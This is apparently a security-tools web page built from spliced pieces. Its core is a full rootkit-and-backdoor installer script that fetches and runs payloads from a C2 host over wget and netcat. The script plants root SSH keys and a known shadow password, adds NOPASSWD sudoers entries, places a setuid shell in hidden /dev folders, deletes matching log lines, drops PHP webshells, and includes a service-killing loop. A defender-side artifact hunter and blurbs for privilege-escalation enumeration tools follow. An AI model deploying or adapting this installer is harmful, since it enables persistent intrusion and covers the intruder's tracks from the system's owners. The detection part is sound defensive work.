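# Constructed tree reproducing the artefacts (not a real system); prints its path.
make_sample_tree() {
    d=$(mktemp -d)
    mkdir -p "$d/etc/ssh" "$d/dev/..." "$d/dev/  " "$d/var/www"
    echo 'www-data ALL=(ALL:ALL) NOPASSWD:ALL' > "$d/etc/sudoers"
    echo 'AuthorizedKeysFile /etc/ssh/authorized_keys' > "$d/etc/ssh/sshd_config"
    : > "$d/dev/  /pwnd"; chmod 4755 "$d/dev/  /pwnd"
    : > "$d/var/www/.src.php"
    printf '%s\n' "$d"
}
```

The checks that cannot be done from files alone (the accept() hook, the fake rsyslogd/udevd processes) need a process listing compared against binary paths, which is what the "Lookup and list process binaries" check in LinEnum above does.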

Latest Released v-2.1 Code:

#!/bin/sh
# cmc / sapling
# installs rootkit & backdoors on debian/centos/pfsense bsd boxes

# root ssh key
SHARED_PUBKEY="ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDKcAi3VkTNZOQsLiiPvE8gyThrLzD2w8g1aN4VArx8ksOfVteVRfDtjWVLgLpdbySjaIBXn4WeViqxf1TZ8fq5loN4tcHnFOvtBs30JQ1JktwXqwvZaHomqZGJeP0IHLK9rYsJZnHbyk4u2qgs/vpM3wkhX86ywpDzTo+xTEV+XPuCBP+e7QIDuBM20rXkHEroIssYDjSus9o3issH/u+iguGulJaW534mZ9YiC6ELoDKLpQ0wCgwEjLfg04Tz6L6mKBjkyq86wb5iDo0+5zrY5XKOJB5BiBsvAULBnA3to203ZaGrJWQP1CdPbpOINHkTekoWJt5W40LSD41pE86z"

### CHANGE ME ###
# urls for webserver where kits/backdoor binaries are hosted
# file names to grab 

C2_URL="http://172.25.58.142/"
C2_IP="172.25.58.142"

# fedora kit
FEDORA_KIT="fedx32.bin"
FEDORA64_KIT="fedx64.bin"
UBUNTU64_KIT="ubux64.bin"
UBUNTU_KIT="ubux32.bin"
BSD_KIT="hole.bin"
TRIXDOOR="trixd00rd-static-ubuntu"
ROOTY="rooty-release.x86"
ROOTYBSD="rootybsd.x64"

#################

ARCH=`uname -i`

do_backdoors() {
        echo "removing utmp.."
        rm -rf /var/run/utmp
        touch /var/run/utmp
        chmod 664 /var/run/utmp 
        echo "installing root ssh key!"
        chattr -i /root/.ssh/authorized*
        if [ ! -d "/root/.ssh" ]; then
            mkdir /root/.ssh
        fi
        echo $SHARED_PUBKEY >> /root/.ssh/authorized_keys2
        echo $SHARED_PUBKEY >> /root/.ssh/authorized_keys
        # add secondary key auth file, for when they inevitably remove /root/.ssh/
        echo $SHARED_PUBKEY >> /etc/ssh/authorized_keys
        echo 'AuthorizedKeysFile /etc/ssh/authorized_keys' >> /etc/ssh/sshd_config
        chattr +i /root/.ssh/authorized_keys*
        echo "dropping trixd00r.." 
        if [ ! -d "/dev/..." ]; then
            mkdir /dev/...
        fi
        cd /dev/...
        wget -q $C2_URL$TRIXDOOR -O rsyslogd
        chmod +x rsyslogd
        env PATH=$PWD MANAGER=$C2_IP /usr/bin/nohup rsyslogd &
        echo "dropping rooty.."
        wget -q $C2_URL$ROOTY -O udevd
        chmod +x udevd
        env PATH=$PWD /usr/bin/nohup udevd &
        # uncomment below to do iptables crontab shenanigans
        # echo "adding 5m disable iptables crontab.."
        # echo "*/5 * * * * /sbin/iptables -F" | crontab -
        echo "backdoor bin account! pass=lol123"
        sed -i -e 's/bin:\*:/bin:$6$OkgT6DOT$0fswsID8AwsBF35QHXQVmDLzYGT.pUtizYw2G9ZCe.o5pPk6HfdDazwdqFIE40muVqJ832z.p.6dATUDytSdV0:/g' /etc/shadow
        usermod -s /bin/sh bin
        echo 'bin ALL=(ALL:ALL) NOPASSWD:ALL' >> /etc/sudoers 
        echo 'www-data ALL=(ALL:ALL) NOPASSWD:ALL' >> /etc/sudoers
        echo 'apache ALL=(ALL:ALL) NOPASSWD:ALL' >> /etc/sudoers
        echo 'httpd ALL=(ALL:ALL) NOPASSWD:ALL' >> /etc/sudoers
        groupadd admin
        # take care of logs, ie 'groupadd[31001]: new group: name=admin, GID=1005' in auth.log
        sed -ie "/groupadd/d" /var/log/auth.log /var/log/messages /var/log/secure
        # ubuntu automatically makes members of admin have sudo capabilities. 
        # lets give that as an option for root to web backdoors
        usermod -G admin -a bin
        usermod -G admin -a www-data
        usermod -G admin -a httpd
        usermod -G admin -a apache
        # take care of logs, ie 'usermod[31005]: add 'bin' to group 'admin'
        sed -ie "/usermod/d" /var/log/auth.log /var/log/messages /var/log/secure
        echo "setuid /bin/sh! for use with bin account"
        if [ ! -d "/dev/  " ]; then
            mkdir "/dev/  "
        fi
        cp /bin/sh "/dev/  /pwnd"
        chmod 777 "/dev/  /pwnd"
        chown root:root "/dev/  /pwnd"
        chmod u+s "/dev/  /pwnd"
        echo "clearing log entries with our IP.."
        sed -ie "/$C2_IP/d" /var/log/auth.log /var/log/messages /var/log/secure
        sed -ie "/passwd/d" /var/log/auth.log /var/log/messages /var/log/secure
        sed -ie "/Accepted password for bin/d" /var/log/auth.log /var/log/messages /var/log/secure
        sed -ie "/Accepted password for root/d" /var/log/auth.log /var/log/messages /var/log/secure
        echo "dropping webshells.."
        # $ escaped so the shell leaves it for PHP; the original nested single
        # quotes produced $_GET[e] (an undefined constant) instead of $_GET['e']
        echo "<?php echo shell_exec(\$_GET['e']); ?>" > /var/www/.src.php
        chmod 777 /var/www/.src.php
        echo "<?php echo shell_exec(\$_GET['e']); ?>" > /var/www/html/.src.php
        chmod 777 /var/www/html/.src.php
}

do_bsdbackdoors() {
        # this was a quick hack for the pfsense firewalls
        # uses netcat vs wget because wget isnt installed on pfsense
        # by default
        echo "installing root ssh key!"
        if [ ! -d "/root/.ssh" ]; then
            mkdir /root/.ssh
        fi
        # same key as the Linux path ($PUBKEY was never defined)
        echo $SHARED_PUBKEY >> /root/.ssh/authorized_keys2
        echo $SHARED_PUBKEY >> /root/.ssh/authorized_keys
        # FreeBSD has no chattr; the schg flag is its immutable equivalent
        chflags schg /root/.ssh/authorized_keys*
        echo "dropping rooty via netcat.."
        # NOTE: must have listening netcat with 'cat rootybsd.bin|nc -l 1338' on c2 server.
        if [ ! -d "/dev/  " ]; then
            mkdir "/dev/  "
        fi
        cd "/dev/  "
        nc $C2_IP 1338 > udevd
        chmod +x udevd
        env PATH=$PWD /usr/bin/nohup udevd &
        echo "dropping webshells.."
        echo '<?php echo shell_exec($_GET['e']); ?>' > /var/www/.src.php
        chmod 777 /var/www/.src.php
        echo '<?php echo shell_exec($_GET['e']); ?>' > /var/www/html/.src.php
        chmod 777 /var/www/html/.src.php
}


do_centos_rootkit() {
	echo "Retrieving Fedora x86 kit..."
        if [ ! -d "/dev/..." ]; then
            mkdir /dev/...
        fi
	cd /dev/...
	wget -q $C2_URL$FEDORA_KIT
	chmod +x `basename $FEDORA_KIT`
	./`basename $FEDORA_KIT`
}

do_centos64_rootkit() {
	echo "Retrieving Fedora x64 kit..."
        if [ ! -d "/dev/..." ]; then
            mkdir /dev/...
        fi
	cd /dev/...
	wget -q $C2_URL$FEDORA64_KIT
	chmod +x `basename $FEDORA64_KIT`
	./`basename $FEDORA64_KIT`
}


do_freebsd64_rootkit() {
    echo "Installing BSD hole.bin.."
    cd /opt/
    # cmc: pfSense / BSD has no wget/curl
    # make sure we have a listening netcat
    # cat backdoor.bin | nc -v -l 13337
    nc $C2_URL 1337 > /opt/scorebotd
    # chmod 0755 `basename $BSD_KIT`
    # mv `basename $BSD_KIT` /opt/scorebotd
    chmod +x /opt/scorebotd
    nohup /opt/scorebotd &
}
do_ubuntu_rootkit() {
	echo "Retrieving ubuntu x86 kit..."
        if [ ! -d "/dev/..." ]; then
            mkdir /dev/...
        fi
	cd /dev/...
	wget -q $C2_URL$UBUNTU_KIT
	chmod +x `basename $UBUNTU_KIT`
	./`basename $UBUNTU_KIT`
}


do_ubuntu64_rootkit() {
echo "Retrieving ubuntu x64 kit..."
    if [ ! -d "/dev/..." ]; then
            mkdir /dev/...
    fi
    cd /dev/...
    wget -q $C2_URL$UBUNTU64_KIT
    chmod +x `basename $UBUNTU64_KIT`
    ./`basename $UBUNTU64_KIT`
}

goodbye_sla() {
    cat <<EOF > /usr/share/service.sh
#!/bin/bash
#UMAD?
while [ 0 ]
do
	service httpd stop
	service postfix stop
	service sendmail stop
	service mysql stop
	service webmin stop
        service named stop
        service bind stop
	killall -9 webmin.pl
	killall -9 apache2
        killall -9 httpd
        killall -9 named
	killall -9 mysqld_safe
	killall -9 mysqld
        sleep 10
done
EOF
chmod +x /usr/share/service.sh
nohup /usr/share/service.sh >/dev/null 2>&1 &
}

# 64bit fedora
if [ $ARCH = "x86_64" ] && [ -f "/etc/redhat-release" ]; then
	do_centos64_rootkit
	do_backdoors
fi

# 32bit fedora
if [ $ARCH != "x86_64" ] && [ -f "/etc/redhat-release" ]; then
	do_centos_rootkit
	do_backdoors
        #goodbye_sla
fi


# ubuntu/debian 64bit 
if [ $ARCH  = "x86_64" ] && [ -f "/etc/debian_version" ]; then
    do_ubuntu64_rootkit
    do_backdoors
    #goodbye_sla
fi

# ubuntu/debian 32bit (assumed if not 64, whatever)
if [ $ARCH != "x86_64" ] && [ -f "/etc/debian_version" ]; then
	do_ubuntu32_rootkit
	do_backdoors
	#goodbye_sla
fi


# freebsd
if [ `uname`  = 'FreeBSD' ]; then
	do_freebsd64_kit
	do_bsdbackdoors    
fi
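The functions above leave a recognisable set of artifacts on a host; the following is an added defender-side example (not part of the original script or project) that hunts for them: NOPASSWD sudoers grants to web service accounts, those accounts in the admin group, setuid files and dot- or space-named directories under /dev, hidden .php files in the web roots, and immutable authorized_keys. The root-prefix parameter is an assumption made so the checks can run against a constructed sample tree; pass "/" on a live host.

```shell
#!/bin/sh
# Added defender-side example (not from the script above): hunt for the
# artifacts it leaves behind. Every function takes a root prefix so the checks
# can run against a constructed sample tree; pass "/" on a real host.

# sudoers lines that hand NOPASSWD rights to a web or service account
hunt_sudoers() {
    grep -E '^(httpd|apache|www-data|bin)[[:space:]]+ALL=.*NOPASSWD' "$1/etc/sudoers" 2>/dev/null
}

# service accounts listed as members of the sudo-capable 'admin' group
hunt_admin_group() {
    grep -E '^admin:[^:]*:[^:]*:(.*,)?(www-data|httpd|apache|bin)(,.*)?$' "$1/etc/group" 2>/dev/null
}

# regular files under /dev carrying the setuid bit (none belong there)
hunt_dev_setuid() {
    find "$1/dev" -type f -perm -4000 2>/dev/null
}

# directories directly under /dev whose names start with a dot or a space
hunt_dev_odd_dirs() {
    find "$1/dev" -mindepth 1 -maxdepth 1 -type d \( -name '.*' -o -name ' *' \) 2>/dev/null
}

# hidden .php files in the common web roots (the dropped .src.php shell)
hunt_hidden_php() {
    find "$1/var/www" -type f -name '.*.php' 2>/dev/null
}

# authorized_keys made immutable with chattr +i, which blocks key removal
hunt_immutable_keys() {
    lsattr "$1"/root/.ssh/authorized_keys* 2>/dev/null | awk '$1 ~ /i/ {print $2}'
}

# run every check, print findings grouped by check, finish with a hit count line
hunt_all() {
    root=${1:-/}; hits=0
    for check in hunt_sudoers hunt_admin_group hunt_dev_setuid \
                 hunt_dev_odd_dirs hunt_hidden_php hunt_immutable_keys; do
        out=$("$check" "$root" || true)
        if [ -n "$out" ]; then
            printf '[%s]\n%s\n' "$check" "$out"
            hits=$((hits + 1))
        fi
    done
    echo "hits=$hits"
}
```

Each match is a lead for review rather than proof of compromise; the /dev directory-name check in particular can flag legitimate hidden directories on older distributions.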


Download : Master.zip  | Clone Url
Source : https://github.com/ketm768

WinEnum and linuxJuicer Released – tools that extract information for privilege escalation on the Windows and Linux platforms.


winEnum is a tool that extracts information useful for privilege escalation on the Windows platform.
linuxJuicer is a tool that extracts information useful for privilege escalation on the Linux platform.
For What?
[+] It can extract juicy information on the Windows platform during the post-exploitation phase.
[+] It helps to find possible privilege escalation vectors.
Example Output winEnum :
1. Finding os details
2. Finding hostname
3. Finding exploited user name
4. All users on the system
5. Getting group membership, active sessions, account lock out policy
– 5.1. Display which group policies are applied and info about the OS if victim is the member of a domain:
6. Checking available network interfaces and routing table
7. routing table
8. Checking ARP cache table for all available interfaces
9. Checking active network connections
Example HTML output:

Example screen capture: wmic-Report.html

Example screen capture: wmic-Report.html – Just try it for your knowledge base :-)

Download :
WinEnum : Master.zip  | Clone URL
linuxJuicer : Master.zip  | Clone URL
Source : https://github.com/greyshell
